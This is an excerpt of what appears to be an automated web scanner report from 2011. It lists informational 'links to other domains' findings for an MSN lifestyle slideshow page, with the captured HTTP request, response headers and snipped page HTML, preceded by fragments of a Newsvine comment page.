<a href="#star18" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://jstoler4156.newsvine.com/">jan-315534</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star19" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://littleadv.newsvine.com/">littleadv</a>
...[SNIP]...
<p><a href="http://bit.ly/gFYrpS">http://bit.ly/gFYrpS</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://cathy15.newsvine.com/">Woodyspond</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star20" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://JimHenigman.newsvine.com/">Jim Henigman</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Zarkon.newsvine.com/">Steve-1309027</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star21" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Haste502.newsvine.com/">Haste502</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BillMarvell.newsvine.com/">Bill Marvell</a>
...[SNIP]...
<div class="normal"><a href="http://add42162.newsvine.com/">Tony-353256</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://TWL.newsvine.com/">Azrancher</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
<div class="normal"><a href="http://msk2877762.newsvine.com/">msk-2877762</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bertfw.newsvine.com/">Bertfw</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star22" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeBrooks.newsvine.com/">Mike Brooks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://jerry194283.newsvine.com/">jerry194283</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://TrudyP.newsvine.com/">Trudy P</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://settersperch.newsvine.com/">settersperch</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://yankinyerchain.newsvine.com/">yankinyerchain</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jpcyphers.newsvine.com/">Cyphers</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
<div class="avatar"><a href="http://allison-linnmsnbc.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/allison-linnmsnbc-846208182.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://www.evetahmincioglu.com/web/blog/">Career Diva</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/money/">Consumer Reports Money</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/">Floyd Norris</a>
...[SNIP]...
<li><a href="http://www.ritholtz.com/blog/">The Big Picture</a>
...[SNIP]...
<li><a href="http://consumerist.com/">The Consumerist</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/juggle/">The Juggle</a>
...[SNIP]...
<li><a href="http://www.suddenlyfrugal.com/">Suddenly Frugal</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/baby/">Consumer Reports Baby & Kids</a>
...[SNIP]...
<li><a href="http://www.economist.com/blogs/freeexchange">The Economist Free Exchange</a>
...[SNIP]...
<li><a href="http://bucks.blogs.nytimes.com/">Bucks</a></li><li><a href="http://blog.penelopetrunk.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://onthejob.45things.com/">On the Job</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo">Want more Life Inc.? Follow me on <a href="http://twitter.com/alinnmsnbc">Twitter</a>, check us out on <a href="http://www.facebook.com/home.php?#!/pages/Life-Inc/135937546449321?ref=ts">Facebook</a>
...[SNIP]...
<li><a href="http://moms.today.com/">TODAY Moms</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted">msnbc.com</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32027560">About us</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32359544/">Contact</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303511/">Help</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/html/HtmlSitemap0.html">Site map</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/27365695/">Careers</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303540/">Terms & Conditions</a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/26613008/">Advertise</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.102. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092

The response contains the following links to other domains:

http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn
http://www.glamour.com/sex-love-life/2009/01/his-top-10-sex-wishes-revealed?mbid=synd_msn
http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/11/7-ways-to-convince-any-man-youre-right?mbid=synd_msn
http://www.glamourmag.com/?mbid=msn
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344841&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D17423139%26gt1%3D32092&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a96db369e9e04f58943dfadec392ad8b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B11FFD8B6C574D6183561463F05E137F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 41515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344841&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D17423139%26gt1%3D32092&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.glamourmag.com/?mbid=msn"><img src="http://blstb.redacted/i/57/CFFA9B69555B8E5C255A69F7F6A5.jpg" width="90" height="30" alt="Glamour" />
...[SNIP]...
<li class="first"><a href="http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn">10 Things He's Thinking When You're Naked</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn">15 Things Men Don't Want You to Know About Them</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/11/7-ways-to-convince-any-man-youre-right?mbid=synd_msn">7 Ways to Convince Any Man You're Right</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2009/01/his-top-10-sex-wishes-revealed?mbid=synd_msn">His Top 10 Sex Wishes Revealed</a>
...[SNIP]...
<li class="last"><a href="http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn">12 Secret Signs He's Into You</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
');" href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ref="http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM"><img src="http://blstb.redacted/i/22/248EF6C657B86F0A8D9A35C6438F.jpg" width="300" height="75" alt="Glamour" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.103. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092

The response contains the following links to other domains:

http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
